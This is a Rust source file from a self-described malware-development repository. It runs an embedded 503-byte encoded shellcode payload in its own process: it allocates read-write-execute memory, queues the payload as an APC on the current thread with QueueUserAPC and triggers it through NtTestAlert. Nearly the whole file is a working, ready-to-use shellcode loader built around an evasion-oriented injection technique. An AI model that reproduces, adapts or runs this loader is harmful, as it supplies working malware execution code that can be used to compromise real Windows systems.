/*
    Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert
    For More Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
    Resources Used: 
        https://www.g0dmode.biz/remote-process-injection/queueuserapc-+-nttestalert
        https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert
    
    By: @5mukx
*/

use std::ptr::null_mut;

// use ntapi::ntpsapi::NtTestAlert;
use winapi::{
    ctypes::c_void, 
    um::{errhandlingapi::GetLastError, 
        libloaderapi::{GetModuleHandleA, GetProcAddress}, 
        memoryapi::VirtualAlloc, 
        processthreadsapi::{GetCurrentThread, QueueUserAPC
        }
    }
};

// pub fn extern "system" fn NtTestAlert() -> NTSTATUS;

type NtTestAlert = extern "system" fn() -> u32;

macro_rules! okey {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\____[+] {}", format!($msg, $($arg), *));
    }
}

macro_rules! error {
    ($msg:expr, $($arg:expr), *) => {
        println!("\\____[-] {}", format!($msg, $($arg), *));
        println!("Exiting...");
        std::process::exit(0);
    }
}


fn main(){
    let buf: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
    0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
    0x55,0x17,0xce,0x4b,0x6d,0xac,0xd4,0x2b,0x48,0x31,0x58,0x27,
    0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xa9,0x5f,0x4d,0xaf,
    0x9d,0x44,0x14,0x2b,0x55,0x17,0x8f,0x1a,0x2c,0xfc,0x86,0x7a,
    0x03,0x5f,0xff,0x99,0x08,0xe4,0x5f,0x79,0x35,0x5f,0x45,0x19,
    0x75,0xe4,0x5f,0x79,0x75,0x5f,0x45,0x39,0x3d,0xe4,0xdb,0x9c,
    0x1f,0x5d,0x83,0x7a,0xa4,0xe4,0xe5,0xeb,0xf9,0x2b,0xaf,0x37,
    0x6f,0x80,0xf4,0x6a,0x94,0xde,0xc3,0x0a,0x6c,0x6d,0x36,0xc6,
    0x07,0x56,0x9f,0x03,0xe6,0xfe,0xf4,0xa0,0x17,0x2b,0x86,0x4a,
    0xbd,0x27,0x54,0xa3,0x55,0x17,0xce,0x03,0xe8,0x6c,0xa0,0x4c,
    0x1d,0x16,0x1e,0x1b,0xe6,0xe4,0xcc,0x6f,0xde,0x57,0xee,0x02,
    0x6c,0x7c,0x37,0x7d,0x1d,0xe8,0x07,0x0a,0xe6,0x98,0x5c,0x63,
    0x54,0xc1,0x83,0x7a,0xa4,0xe4,0xe5,0xeb,0xf9,0x56,0x0f,0x82,
    0x60,0xed,0xd5,0xea,0x6d,0xf7,0xbb,0xba,0x21,0xaf,0x98,0x0f,
    0x5d,0x52,0xf7,0x9a,0x18,0x74,0x8c,0x6f,0xde,0x57,0xea,0x02,
    0x6c,0x7c,0xb2,0x6a,0xde,0x1b,0x86,0x0f,0xe6,0xec,0xc8,0x62,
    0x54,0xc7,0x8f,0xc0,0x69,0x24,0x9c,0x2a,0x85,0x56,0x96,0x0a,
    0x35,0xf2,0x8d,0x71,0x14,0x4f,0x8f,0x12,0x2c,0xf6,0x9c,0xa8,
    0xb9,0x37,0x8f,0x19,0x92,0x4c,0x8c,0x6a,0x0c,0x4d,0x86,0xc0,
    0x7f,0x45,0x83,0xd4,0xaa,0xe8,0x93,0x02,0xd3,0xdb,0xa7,0x19,
    0x0a,0x24,0xfc,0x4b,0x6d,0xed,0x82,0x62,0xdc,0xf1,0x86,0xca,
    0x81,0x0c,0xd5,0x2b,0x55,0x5e,0x47,0xae,0x24,0x10,0xd6,0x2b,
    0x54,0xac,0x0e,0xe3,0x6c,0xe7,0x95,0x7f,0x1c,0x9e,0x2a,0x07,
    0xe4,0x5d,0x95,0x91,0x19,0x60,0xe8,0x4c,0x92,0x79,0x98,0xa2,
    0xbf,0x7f,0xcf,0x4a,0x6d,0xac,0x8d,0x6a,0xef,0x3e,0x4e,0x20,
    0x6d,0x53,0x01,0x7b,0x05,0x5a,0xff,0x82,0x20,0x9d,0x14,0x63,
    0xaa,0xd7,0x86,0xc2,0xaf,0xe4,0x2b,0xeb,0x1d,0x9e,0x0f,0x0a,
    0xd7,0x46,0xdb,0xf4,0xb5,0xe8,0x1b,0x03,0xe4,0x6b,0xbe,0x3b,
    0x14,0x4f,0x82,0xc2,0x8f,0xe4,0x5d,0xd2,0x14,0xad,0x57,0xee,
    0x19,0xcd,0x2b,0xfe,0x1d,0x96,0x0a,0x0b,0x6f,0xac,0xd4,0x62,
    0xed,0x74,0xa3,0x2f,0x6d,0xac,0xd4,0x2b,0x55,0x56,0x9e,0x0a,
    0x3d,0xe4,0x5d,0xc9,0x02,0x40,0x99,0x06,0x5c,0x6c,0xbe,0x26,
    0x0c,0x56,0x9e,0xa9,0x91,0xca,0x13,0x6f,0x71,0x43,0xcf,0x4a,
    0x25,0x21,0x90,0x0f,0x4d,0xd1,0xce,0x23,0x25,0x25,0x32,0x7d,
    0x05,0x56,0x9e,0x0a,0x3d,0xed,0x84,0x62,0xaa,0xd7,0x8f,0x1b,
    0x24,0x53,0x1c,0x66,0xdc,0xd6,0x82,0xc2,0xac,0xed,0x6e,0x52,
    0x99,0x28,0x48,0xb4,0xb8,0xe4,0xe5,0xf9,0x1d,0xe8,0x04,0xc0,
    0x63,0xed,0x6e,0x23,0xd2,0x0a,0xae,0xb4,0xb8,0x17,0x24,0x9e,
    0xf7,0x41,0x8f,0xf1,0xcb,0x39,0x69,0xb6,0xaa,0xc2,0x86,0xc8,
    0xa9,0x84,0xe8,0x2d,0x29,0x1d,0x4e,0xb0,0x8d,0xd9,0xd1,0x90,
    0x12,0x04,0xbc,0x24,0x07,0xac,0x8d,0x6a,0xdc,0xcd,0x31,0x9e,
    0x6d,0xac,0xd4,0x2b];

    println!("| SC Exec in LP with QueueUserAPC and NtTestAlert");
    unsafe{
        let ntdll_handle = GetModuleHandleA("ntdll\0".as_ptr() as _);
        let nt_test_alert = GetProcAddress(ntdll_handle, "NtTestAlert\0".as_ptr() as _); 
        
        if nt_test_alert.is_null(){
            error!("Unable to get address of NtTestAlert: {:#?}",GetLastError());
        }

        okey!("GetModuleHandleA Addr: {:#?}",ntdll_handle);
        okey!("NtTestAlert Addr: {:#?}",nt_test_alert);

        let address = VirtualAlloc(
            null_mut(),
            buf.len(),
            0x1000, // MEM_COMMIT
            0x40, // PAGE_EXECUTIVE_READWRITE
        );

        okey!("VirtualAllocated Addr: {:#?}",address);

        if address.is_null(){
            error!("VirtualAlloc Error: {:#?}",GetLastError());
        }

        // okey!("VirtualAlloc : {:#?}",address);

        // std::ptr::copy(buf.as_ptr(), address as *mut u8, buf.len());

        // let apc_routine = address as usize as *mut c_void;

        // QueueUserAPC(Some(std::mem::transmute(apc_routine)), GetCurrentThread(), null_mut());
        if !nt_test_alert.is_null() {
            let test_alert: NtTestAlert = std::mem::transmute(nt_test_alert);
    
            let shell_size = buf.len();
            let shell_address =
                VirtualAlloc(
                    null_mut(),
                    shell_size,
                    0x1000,
                    0x40,
                );
            
           
            std::ptr::copy(buf.as_ptr(), shell_address as *mut u8, shell_size);
        
    
            let apc_routine = shell_address as usize as *mut c_void;
            
            okey!("APC Addr: {:?}",apc_routine);
            
            QueueUserAPC(Some(std::mem::transmute(apc_routine)), GetCurrentThread(), 0);
            test_alert();
            
        } else {
            println!("Failed to retrieve address for NtTestAlert");
        }
    }
}

